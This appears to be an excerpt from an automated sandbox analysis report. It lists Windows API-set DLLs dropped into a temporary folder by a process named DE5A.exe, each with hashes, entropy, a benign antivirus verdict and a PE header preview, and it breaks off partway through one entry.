                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18696
                                                                                                                                                                                                                                Entropy (8bit):7.054510010549814
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
                                                                                                                                                                                                                                MD5:BFFFA7117FD9B1622C66D949BAC3F1D7
                                                                                                                                                                                                                                SHA1:402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
                                                                                                                                                                                                                                SHA-256:1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
                                                                                                                                                                                                                                SHA-512:B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.625331165566263
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qzWqhWxWJWadJCsVWQ4mW8RJLNVAv+cQ0GX01k9z3ARo8ef3uBJu:qzWqhWwCsjNbZR9zQoEzu
                                                                                                                                                                                                                                MD5:E89CDCD4D95CDA04E4ABBA8193A5B492
                                                                                                                                                                                                                                SHA1:5C0AEE81F32D7F9EC9F0650239EE58880C9B0337
                                                                                                                                                                                                                                SHA-256:1A489E0606484BD71A0D9CB37A1DC6CA8437777B3D67BFC8C0075D0CC59E6238
                                                                                                                                                                                                                                SHA-512:55D01E68C8C899E99A3C62C2C36D6BCB1A66FF6ECD2636D2D0157409A1F53A84CE5D6F0C703D5ED47F8E9E2D1C9D2D87CC52585EE624A23D92183062C999B97E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.737397647066978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:OdxlZWqhWcWJWadJCsVWQ4mWlhtFyttuX01k9z3A2oD:OdxlZWqhWpCsctkSR9zfoD
                                                                                                                                                                                                                                MD5:ACCC640D1B06FB8552FE02F823126FF5
                                                                                                                                                                                                                                SHA1:82CCC763D62660BFA8B8A09E566120D469F6AB67
                                                                                                                                                                                                                                SHA-256:332BA469AE84AA72EC8CCE2B33781DB1AB81A42ECE5863F7A3CB5A990059594F
                                                                                                                                                                                                                                SHA-512:6382302FB7158FC9F2BE790811E5C459C5C441F8CAEE63DF1E09B203B8077A27E023C4C01957B252AC8AC288F8310BCEE5B4DCC1F7FC691458B90CDFAA36DCBE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@.......A....`A........................................p................0...............0..x&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.6569647133331316
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dwWqhWWWEXCVWQ4mWLnySfKUSIX01k9z3AEXz5SLaDa3:iWqhWJhY2IR9z5YLt3
                                                                                                                                                                                                                                MD5:C6024CC04201312F7688A021D25B056D
                                                                                                                                                                                                                                SHA1:48A1D01AE8BC90F889FB5F09C0D2A0602EE4B0FD
                                                                                                                                                                                                                                SHA-256:8751D30DF554AF08EF42D2FAA0A71ABCF8C7D17CE9E9FF2EA68A4662603EC500
                                                                                                                                                                                                                                SHA-512:D86C773416B332945ACBB95CBE90E16730EF8E16B7F3CCD459D7131485760C2F07E95951AEB47C1CF29DE76AFFEB1C21BDF6D8260845E32205FE8411ED5EFA47
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......v.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.882042129450427
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:9TvuBL3BBLAWqhWUWEXCVWQ4iWgdCLVx6RMySX01k9z3AzaXQ+BB:9TvuBL3BaWqhW/WSMR9zqaP
                                                                                                                                                                                                                                MD5:1F2A00E72BC8FA2BD887BDB651ED6DE5
                                                                                                                                                                                                                                SHA1:04D92E41CE002251CC09C297CF2B38C4263709EA
                                                                                                                                                                                                                                SHA-256:9C8A08A7D40B6F697A21054770F1AFA9FFB197F90EF1EEE77C67751DF28B7142
                                                                                                                                                                                                                                SHA-512:8CF72DF019F9FC9CD22FF77C37A563652BECEE0708FF5C6F1DA87317F41037909E64DCBDCC43E890C5777E6BCFA4035A27AFC1AEEB0F5DEBA878E3E9AEF7B02A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):5.355894399765837
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:0naOMw3zdp3bwjGzue9/0jCRrndbnWqhW5lFydVXC4deR9zVj7xR:FOMwBprwjGzue9/0jCRrndbtGydVXC4O
                                                                                                                                                                                                                                MD5:724223109E49CB01D61D63A8BE926B8F
                                                                                                                                                                                                                                SHA1:072A4D01E01DBBAB7281D9BD3ADD76F9A3C8B23B
                                                                                                                                                                                                                                SHA-256:4E975F618DF01A492AE433DFF0DD713774D47568E44C377CEEF9E5B34AAD1210
                                                                                                                                                                                                                                SHA-512:19B0065B894DC66C30A602C9464F118E7F84D83010E74457D48E93AACA4422812B093B15247B24D5C398B42EF0319108700543D13F156067B169CCFB4D7B6B7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@......L0....`A........................................p................0...............0..h&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.771309314175772
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:L0WqhWTWEXCVWQ4cRWdmjKDUX01k9z3AQyMX/7kn:L0WqhWol1pR9zzDY
                                                                                                                                                                                                                                MD5:3C38AAC78B7CE7F94F4916372800E242
                                                                                                                                                                                                                                SHA1:C793186BCF8FDB55A1B74568102B4E073F6971D6
                                                                                                                                                                                                                                SHA-256:3F81A149BA3862776AF307D5C7FEEF978F258196F0A1BF909DA2D3F440FF954D
                                                                                                                                                                                                                                SHA-512:C2746AA4342C6AFFFBD174819440E1BBF4371A7FED29738801C75B49E2F4F94FD6D013E002BAD2AADAFBC477171B8332C8C5579D624684EF1AFBFDE9384B8588
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......K.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.7115212149950185
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:bWqhWUxWJWadJCsVWQ4mW5iFyttuX01k9z3A2EC:bWqhWUwCs8SR9zfEC
                                                                                                                                                                                                                                MD5:321A3CA50E80795018D55A19BF799197
                                                                                                                                                                                                                                SHA1:DF2D3C95FB4CBB298D255D342F204121D9D7EF7F
                                                                                                                                                                                                                                SHA-256:5476DB3A4FECF532F96D48F9802C966FDEF98EC8D89978A79540CB4DB352C15F
                                                                                                                                                                                                                                SHA-512:3EC20E1AC39A98CB5F726D8390C2EE3CD4CD0BF118FDDA7271F7604A4946D78778713B675D19DD3E1EC1D6D4D097ABE9CD6D0F76B3A7DFF53CE8D6DBC146870A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.893761152454321
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dEFP2WqhWVWEXCVWQ4mW68vx6RMySX01k9z3AzapOP:eF+WqhWi6gMR9zqa0
                                                                                                                                                                                                                                MD5:0462E22F779295446CD0B63E61142CA5
                                                                                                                                                                                                                                SHA1:616A325CD5B0971821571B880907CE1B181126AE
                                                                                                                                                                                                                                SHA-256:0B6B598EC28A9E3D646F2BB37E1A57A3DDA069A55FBA86333727719585B1886E
                                                                                                                                                                                                                                SHA-512:07B34DCA6B3078F7D1E8EDE5C639F697C71210DCF9F05212FD16EB181AB4AC62286BC4A7CE0D84832C17F5916D0224D1E8AAB210CEEFF811FC6724C8845A74FE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@............`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):5.231196901820079
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:/Mck1JzX9cKSI0WqhWsWJWadJCsVWQ4mWClLeyttuX01k9z3A2XCJq:Uck1JzNcKSI0WqhWZCsvfSR9zfyk
                                                                                                                                                                                                                                MD5:C3632083B312C184CBDD96551FED5519
                                                                                                                                                                                                                                SHA1:A93E8E0AF42A144009727D2DECB337F963A9312E
                                                                                                                                                                                                                                SHA-256:BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
                                                                                                                                                                                                                                SHA-512:8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.799245167892134
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
                                                                                                                                                                                                                                MD5:517EB9E2CB671AE49F99173D7F7CE43F
                                                                                                                                                                                                                                SHA1:4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
                                                                                                                                                                                                                                SHA-256:57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
                                                                                                                                                                                                                                SHA-512:492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.587063911311469
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
                                                                                                                                                                                                                                MD5:F3FF2D544F5CD9E66BFB8D170B661673
                                                                                                                                                                                                                                SHA1:9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
                                                                                                                                                                                                                                SHA-256:E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
                                                                                                                                                                                                                                SHA-512:184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.754374422741657
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
                                                                                                                                                                                                                                MD5:A0C2DBE0F5E18D1ADD0D1BA22580893B
                                                                                                                                                                                                                                SHA1:29624DF37151905467A223486500ED75617A1DFD
                                                                                                                                                                                                                                SHA-256:3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
                                                                                                                                                                                                                                SHA-512:3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.664553499673792
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
                                                                                                                                                                                                                                MD5:2666581584BA60D48716420A6080ABDA
                                                                                                                                                                                                                                SHA1:C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
                                                                                                                                                                                                                                SHA-256:27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
                                                                                                                                                                                                                                SHA-512:BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.834520503429805
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
                                                                                                                                                                                                                                MD5:1281E9D1750431D2FE3B480A8175D45C
                                                                                                                                                                                                                                SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
                                                                                                                                                                                                                                SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
                                                                                                                                                                                                                                SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.916367637528538
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
                                                                                                                                                                                                                                MD5:FD46C3F6361E79B8616F56B22D935A53
                                                                                                                                                                                                                                SHA1:107F488AD966633579D8EC5EB1919541F07532CE
